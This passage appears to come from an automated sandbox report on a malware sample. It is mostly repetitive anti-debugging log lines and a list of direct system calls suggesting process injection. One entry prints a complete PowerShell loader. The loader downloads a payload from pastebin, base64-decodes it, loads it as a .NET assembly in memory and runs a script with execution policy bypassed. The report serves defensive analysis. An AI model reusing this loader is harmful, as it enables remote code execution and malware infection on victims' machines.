                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6F5B0 mov eax, dword ptr fs:[00000030h]10_2_01A6F5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A645B1 mov eax, dword ptr fs:[00000030h]10_2_01A645B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A645B1 mov eax, dword ptr fs:[00000030h]10_2_01A645B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD35BA mov eax, dword ptr fs:[00000030h]10_2_01AD35BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD35BA mov eax, dword ptr fs:[00000030h]10_2_01AD35BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD35BA mov eax, dword ptr fs:[00000030h]10_2_01AD35BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AD35BA mov eax, dword ptr fs:[00000030h]10_2_01AD35BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A42582 mov eax, dword ptr fs:[00000030h]10_2_01A42582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A42582 mov ecx, dword ptr fs:[00000030h]10_2_01A42582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3758F mov eax, dword ptr fs:[00000030h]10_2_01A3758F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3758F mov eax, dword ptr fs:[00000030h]10_2_01A3758F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3758F mov eax, dword ptr fs:[00000030h]10_2_01A3758F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A74588 mov eax, dword ptr fs:[00000030h]10_2_01A74588
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ACB594 mov eax, dword ptr fs:[00000030h]10_2_01ACB594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ACB594 mov eax, dword ptr fs:[00000030h]10_2_01ACB594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E59C mov eax, dword ptr fs:[00000030h]10_2_01A7E59C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E5E7 mov eax, dword ptr fs:[00000030h]10_2_01A6E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A425E0 mov eax, dword ptr fs:[00000030h]10_2_01A425E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7C5ED mov eax, dword ptr fs:[00000030h]10_2_01A7C5ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7C5ED mov eax, dword ptr fs:[00000030h]10_2_01A7C5ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A615F4 mov eax, dword ptr fs:[00000030h]10_2_01A615F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B135D7 mov eax, dword ptr fs:[00000030h]10_2_01B135D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B135D7 mov eax, dword ptr fs:[00000030h]10_2_01B135D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B135D7 mov eax, dword ptr fs:[00000030h]10_2_01B135D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A755C0 mov eax, dword ptr fs:[00000030h]10_2_01A755C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E5CF mov eax, dword ptr fs:[00000030h]10_2_01A7E5CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E5CF mov eax, dword ptr fs:[00000030h]10_2_01A7E5CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A465D0 mov eax, dword ptr fs:[00000030h]10_2_01A465D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7A5D0 mov eax, dword ptr fs:[00000030h]10_2_01A7A5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7A5D0 mov eax, dword ptr fs:[00000030h]10_2_01A7A5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B155C9 mov eax, dword ptr fs:[00000030h]10_2_01B155C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ABD5D0 mov eax, dword ptr fs:[00000030h]10_2_01ABD5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ABD5D0 mov ecx, dword ptr fs:[00000030h]10_2_01ABD5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A695DA mov eax, dword ptr fs:[00000030h]10_2_01A695DA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFB52F mov eax, dword ptr fs:[00000030h]10_2_01AFB52F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B15537 mov eax, dword ptr fs:[00000030h]10_2_01B15537
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEF525 mov eax, dword ptr fs:[00000030h]10_2_01AEF525
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50535 mov eax, dword ptr fs:[00000030h]10_2_01A50535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4D534 mov eax, dword ptr fs:[00000030h]10_2_01A4D534
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7D530 mov eax, dword ptr fs:[00000030h]10_2_01A7D530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7D530 mov eax, dword ptr fs:[00000030h]10_2_01A7D530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]10_2_01A6E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]10_2_01A6E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]10_2_01A6E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]10_2_01A6E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6E53E mov eax, dword ptr fs:[00000030h]10_2_01A6E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A77505 mov eax, dword ptr fs:[00000030h]10_2_01A77505
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A77505 mov ecx, dword ptr fs:[00000030h]10_2_01A77505
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B14500 mov eax, dword ptr fs:[00000030h]10_2_01B14500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3B562 mov eax, dword ptr fs:[00000030h]10_2_01A3B562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7656A mov eax, dword ptr fs:[00000030h]10_2_01A7656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7656A mov eax, dword ptr fs:[00000030h]10_2_01A7656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7656A mov eax, dword ptr fs:[00000030h]10_2_01A7656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7B570 mov eax, dword ptr fs:[00000030h]10_2_01A7B570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7B570 mov eax, dword ptr fs:[00000030h]10_2_01A7B570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A48550 mov eax, dword ptr fs:[00000030h]10_2_01A48550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A48550 mov eax, dword ptr fs:[00000030h]10_2_01A48550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A464AB mov eax, dword ptr fs:[00000030h]10_2_01A464AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A734B0 mov eax, dword ptr fs:[00000030h]10_2_01A734B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A744B0 mov ecx, dword ptr fs:[00000030h]10_2_01A744B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ACA4B0 mov eax, dword ptr fs:[00000030h]10_2_01ACA4B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A49486 mov eax, dword ptr fs:[00000030h]10_2_01A49486
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A49486 mov eax, dword ptr fs:[00000030h]10_2_01A49486
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3B480 mov eax, dword ptr fs:[00000030h]10_2_01A3B480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A404E5 mov ecx, dword ptr fs:[00000030h]10_2_01A404E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AE94E0 mov eax, dword ptr fs:[00000030h]10_2_01AE94E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B154DB mov eax, dword ptr fs:[00000030h]10_2_01B154DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3E420 mov eax, dword ptr fs:[00000030h]10_2_01A3E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3E420 mov eax, dword ptr fs:[00000030h]10_2_01A3E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3E420 mov eax, dword ptr fs:[00000030h]10_2_01A3E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3C427 mov eax, dword ptr fs:[00000030h]10_2_01A3C427
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7A430 mov eax, dword ptr fs:[00000030h]10_2_01A7A430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A78402 mov eax, dword ptr fs:[00000030h]10_2_01A78402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A78402 mov eax, dword ptr fs:[00000030h]10_2_01A78402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A78402 mov eax, dword ptr fs:[00000030h]10_2_01A78402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6340D mov eax, dword ptr fs:[00000030h]10_2_01A6340D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A41460 mov eax, dword ptr fs:[00000030h]10_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A41460 mov eax, dword ptr fs:[00000030h]10_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A41460 mov eax, dword ptr fs:[00000030h]10_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A41460 mov eax, dword ptr fs:[00000030h]10_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A41460 mov eax, dword ptr fs:[00000030h]10_2_01A41460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5F460 mov eax, dword ptr fs:[00000030h]10_2_01A5F460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B1547F mov eax, dword ptr fs:[00000030h]10_2_01B1547F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6A470 mov eax, dword ptr fs:[00000030h]10_2_01A6A470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6A470 mov eax, dword ptr fs:[00000030h]10_2_01A6A470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6A470 mov eax, dword ptr fs:[00000030h]10_2_01A6A470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4B440 mov eax, dword ptr fs:[00000030h]10_2_01A4B440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]10_2_01A7E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFF453 mov eax, dword ptr fs:[00000030h]10_2_01AFF453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A6245A mov eax, dword ptr fs:[00000030h]10_2_01A6245A

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded Q1|~y$T 7eMS
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtSetInformationThread: Direct from: 0x77D62B4C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtReadVirtualMemory: Direct from: 0x77D62E8C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtCreateKey: Direct from: 0x77D62C6C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQueryAttributesFile: Direct from: 0x77D62E6C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQuerySystemInformation: Direct from: 0x77D648CC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQueryVolumeInformationFile: Direct from: 0x77D62F2C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtAllocateVirtualMemory: Direct from: 0x77D648EC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtOpenSection: Direct from: 0x77D62E0C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtDeviceIoControlFile: Direct from: 0x77D62AEC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQuerySystemInformation: Direct from: 0x77D62DFC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtReadFile: Direct from: 0x77D62ADC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtDelayExecution: Direct from: 0x77D62DDC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQueryInformationProcess: Direct from: 0x77D62C26
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtResumeThread: Direct from: 0x77D62FBC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtWriteVirtualMemory: Direct from: 0x77D6490C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtCreateUserProcess: Direct from: 0x77D6371C
